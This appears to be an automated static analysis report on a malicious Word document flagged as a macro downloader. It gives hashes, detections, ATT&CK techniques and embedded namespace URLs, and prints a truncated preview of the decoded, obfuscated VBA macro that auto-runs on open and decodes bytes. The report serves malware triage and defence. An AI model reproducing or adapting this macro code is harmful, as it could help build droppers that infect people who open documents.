Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc4a3db433b364e7…

MALICIOUS

Office (OLE)

Size: 291.5 KB
Created: 2018-04-24 13:18:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: 0afacf95729e475e59225cdd76837408
SHA-1: 443b2a2bf689bad812fa9ff3254b349120cf6242
SHA-256: bc4a3db433b364e768b1321be773c9da982b394ae04287b8f54a5d7c993862c0
Risk Score: 124

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initiating malicious actions. The presence of the 'macros.bas' artifact and the ClamAV detection 'Doc.Downloader.Macro-6539595-0' strongly indicate that this macro is designed to download and execute a secondary payload. The document body content appears to be unrelated biographical information, likely a lure.

Heuristics (5)

  • ClamAV: Doc.Downloader.Macro-6539595-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected [medium, 1 related finding, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11012 bytes
SHA-256: f39da388195cb52d7098d0992e9447cf40802925ea726d0c49baa270fda4cddc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Private Sub Document_Open()
cattleman
bullheaded = 58 + 39
 Pmt 0, bullheaded, 25307, 29079, 3
End Sub




Attribute VB_Name = "bModule"
Function liliidae(arytenoid)
Dim arius As Integer
Dim caseworm As Byte
Dim clofibrate As Variant
Dim grinder As String
#If (22 - 89 + 467 + 103 - 96 + 293) > ((81 - 105 + 344) - (79 - 97 + 558) * 1) And ((76 - 48 + 0) - (43 - 116 + 101)) * 2 < (Win64) Then
Dim discrete As Byte
Dim lanthorn As LongPtr
cwater = 20 - 50 + 38
Dim foxhound As LongPtr
Dim distinction As Byte
Dim coryphaenidae As Integer
Dim impunity As LongPtr
Dim canthus As Long
dexterity = VarPtr(lanthorn)
convener = dulce(dexterity, VarPtr(arytenoid) + (68 - 92 + 32), cwater)
#ElseIf (116 - 24 + 308 + 18 - 58 + 340) > ((115 - 110 + 315) - (32 - 79 + 587) * 1) And Not ((4 - 53 + 77) - (107 - 86 + 7)) * 2 < (Win64) Then
Dim lanthorn As Long
cwater = 72 - 40 - 28
Dim foxhound As Long
Dim impunity As Long
dexterity = VarPtr(lanthorn)
convener = cromwell(dexterity, VarPtr(arytenoid) + (67 - 57 - 2), cwater)
#End If
sharply = 106 - 111 + 4
foxhound = 79 - 123 + 44
libration = 82 - 79 - 3
impunity = 3 - 28 + 9628
mespilus = 86 - 64 + 4074
paleocrystic = 95 - 45 + 14
deprive = arrive(ByVal sharply, _
foxhound, ByVal libration, impunity, ByVal mespilus, _
ByVal paleocrystic)
culicidae = culicidae
catabolic = "filamentiferous"
#If (22 - 89 + 467 + 103 - 96 + 293) > ((81 - 105 + 344) - (79 - 97 + 558) * 1) And ((76 - 48 + 0) - (43 - 116 + 101)) * 2 < (Win64) Then
avoidless = dulce(foxhound, lanthorn, 29 - 122 + 5976)
#ElseIf (116 - 24 + 308 + 18 - 58 + 340) > ((115 - 110 + 315) - (32 - 79 + 587) * 1) And Not ((4 - 53 + 77) - (107 - 86 + 7)) * 2 < (Win64) Then
avoidless = cromwell(foxhound, lanthorn, 29 - 122 + 5976)
#End If
baronet = 49 + 6
Pmt 0, baronet, 21495, 16228, 2
liliidae = foxhound
End Function


Attribute VB_Name = "cModule2"
Function dulce(ganger, doorpost, cantharides)
Dim standdown As Long
Dim evaluation As Variant
Dim printable As LongPtr
Dim clough As LongPtr
Dim lumberyard As LongPtr
Dim fb As Variant
Dim formulary As LongPtr
Dim muerte As LongPtr
culicidae = culicidae
catabolic = "elbowing"
clough = ganger
muerte = cantharides
phoebe = Rnd(432)
formulary = doorpost
adventism = 6 + 46
 Pmt 0, adventism, 38772, 22864, 6

catoptromancy = Math.Round(453)
printable = 87 - 43 - 45
meprobamate ByVal printable, _
clough, _
formulary, muerte, _
lumberyard
frantic = Math.Round(160)
End Function
Function offspring(unbelieving) As String
Dim bene(6962) As Byte
Dim prehension(63) As Long
Dim obligations() As Byte
Dim undervaluation(63) As Long
Dim colonization(63) As Long
Dim kid As Long
Dim agamist As Long
Dim acoraceae As String
Dim flora As Long
culicidae = "linouae"

Dim oblong As Integer
Dim conversing As Long
asclepiadaceous = 48 - 16 + 224
earwitness = 115 - 119 + 4100
handsomely = 106 - 77 + 258019
Dim ablepsia As Long

Dim ascertained As Byte

chimneysweeper = 87 - 11 + 262068
abridgment = 71 - 71 + 65280
myxophyceae = 76 - 34 + 213
alarmism = 31 - 5 + 4006
Dim atop As String

adroit = 97 - 25 + 16711608
reproach = 79 - 4 - 12
balderdash = 9 - 87 + 142
nonassertive = 81 - 2 + 16514993
halfmoon = 86 - 46 + 65496
Dim arch As String
avahi = 67 - 23 + 7799
Dim exhale() As Byte
exhale = VBA.StrConv(unbelieving, 120 + 8)
econometrician = 25 + 59
 Pmt 0, econometrician, 29566, 50946, 6

stevedore = 7843
crowbait = vbKeyShift - 12
For min = 0 To stevedore
If min Mod 2 = 0 Then
exhale(min) = exhale(min) - crowbait
Else
exhale(min) = exhale(min) - (crowbait - 1)
End If
Next min
baroreceptor = 48 + 16
 Pmt 0, baroreceptor, 38624, 32641, 2

oblong = 0
primeval = barred
For conversing = (16 - 8 * 2) * 1 To (80 / 2
... (truncated)